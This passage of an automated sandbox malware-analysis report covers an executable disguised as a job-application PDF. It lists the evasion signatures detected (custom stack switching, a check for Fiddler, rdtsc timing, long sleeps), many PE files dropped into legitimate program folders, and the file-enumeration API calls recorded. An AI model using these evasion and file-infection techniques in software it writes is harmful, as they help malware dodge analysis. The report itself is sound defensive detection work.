            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeAPI/Special instruction interceptor: Address: B36E14
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1187258830.0000000000C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEYJ
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E rdtsc 3_2_03A7096E
            Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 490Jump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 9681
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 5081
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 4890
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeAPI coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe TID: 7740Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7788Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\msdtc.exe TID: 7328Thread sleep count: 490 > 30Jump to behavior
            Source: C:\Windows\System32\msdtc.exe TID: 7328Thread sleep time: -49000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384Thread sleep count: 9681 > 30
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384Thread sleep time: -96810000s >= -30000s
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384Thread sleep count: 317 > 30
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384Thread sleep time: -3170000s >= -30000s
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596Thread sleep count: 5081 > 30
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596Thread sleep time: -10162000s >= -30000s
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596Thread sleep count: 4890 > 30
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596Thread sleep time: -9780000s >= -30000s
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe TID: 8708Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mfpmp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mfpmp.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
